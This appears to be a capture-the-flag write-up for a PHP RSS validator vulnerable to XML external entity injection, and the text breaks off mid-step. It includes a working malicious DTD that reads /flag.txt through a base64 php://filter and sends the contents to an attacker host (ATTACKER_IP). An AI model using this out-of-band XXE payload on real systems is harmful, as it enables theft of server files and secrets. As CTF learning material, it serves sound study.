Here is my advice:

• If OOB XXE is new, simply Google for write-ups showing how it was handled, as it is a very common CTF challenge. It’s a complicated concept!

Description: Use the RSS Validator to verify your feed. The system is extremely secure... unless you know how to talk to it.

Vulnerability Analysis

The application is a PHP-based RSS Validator that accepts XML input. It explicitly enables external entity loading (libxml_disable_entity_loader(false) and LIBXML_NOENT).

This makes it vulnerable to XML External Entity (XXE) injection. Since the response does not show the file content, we use Out-of-Band (OOB) exfiltration.

Exploitation Steps (HTTP OOB)

Since the application is running PHP, we can use the powerful php://filter wrapper to Base64 encode the flag before exfiltration. This ensures that special characters in the flag (like {, }, newlines) do not break the HTTP request URL.

1. Prerequisite: Publicly Accessible Server

You need a server that the challenge container can reach. Let's assume your attacker URL is: http://ATTACKER_IP:8000

2. Create the Malicious DTD (evil.dtd)

Create evil.dtd on your attacker server. Notice the use of php://filter:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://ATTACKER_IP:8000/?data=%file;'>">
%eval;
%exfiltrate;

Explanation:

1. %file reads /flag.txt but runs it through the base64-encode filter first.
2. %eval creates the %exfiltrate entity that requests your server with ?data=BASE64_CONTENT.
3. This is safe for HTTP because Base64 valid characters are URL-safe enough (or at least don't contain whitespace/control chars).

Host the malicious external .dtd file on your Kali Linux attacker machine: